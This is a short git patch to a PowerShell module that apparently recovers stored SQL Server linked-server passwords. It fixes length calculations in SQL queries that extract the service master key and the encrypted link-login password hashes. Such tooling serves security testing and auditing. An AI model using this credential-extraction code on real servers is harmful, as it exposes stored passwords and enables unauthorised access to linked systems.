From 606153b890f831e94890ef85793451b28ead0433 Mon Sep 17 00:00:00 2001 From: Jorge Henrique Nunes de Vasconcelos Date: Mon, 4 Feb 2019 14:13:49 -0300 Subject: [PATCH] Changed function to get the length of Smk and password hash. Fixes #3 --- Get-MSSQLLinkPasswords.psm1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Get-MSSQLLinkPasswords.psm1 b/Get-MSSQLLinkPasswords.psm1 index 2644dd7..513d802 100644 --- a/Get-MSSQLLinkPasswords.psm1 +++ b/Get-MSSQLLinkPasswords.psm1 @@ -71,7 +71,7 @@ function Get-MSSQLLinkPasswords{ if ($Conn.State -eq "Open"){ # Query Service Master Key from the database - remove padding from the key # key_id 102 eq service master key, thumbprint 3 means encrypted with machinekey - $SqlCmd="SELECT substring(crypt_property,9,len(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)" + $SqlCmd="SELECT substring(crypt_property,9,datalength(crypt_property)-8) FROM sys.key_encryptions WHERE key_id=102 and (thumbprint=0x03 or thumbprint=0x0300000001)" $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn); $SmkBytes=$Cmd.ExecuteScalar() @@ -97,7 +97,7 @@ function Get-MSSQLLinkPasswords{ # Remove header from pwdhash, extract IV (as iv) and ciphertext (as pass) # Ignore links with blank credentials (integrated auth ?) $SqlCmd = "SELECT sysservers.srvname,syslnklgns.name,substring(syslnklgns.pwdhash,5,$ivlen) iv,substring(syslnklgns.pwdhash,$($ivlen+5), - len(syslnklgns.pwdhash)-$($ivlen+4)) pass FROM master.sys.syslnklgns inner join master.sys.sysservers on syslnklgns.srvid=sysservers.srvid WHERE len(pwdhash)>0" + datalength(syslnklgns.pwdhash)-$($ivlen+4)) pass FROM master.sys.syslnklgns inner join master.sys.sysservers on syslnklgns.srvid=sysservers.srvid WHERE datalength(pwdhash)>0" $Cmd = New-Object System.Data.SqlClient.SqlCommand($SqlCmd,$Conn); $Data=$Cmd.ExecuteReader() $Dt = New-Object "System.Data.DataTable"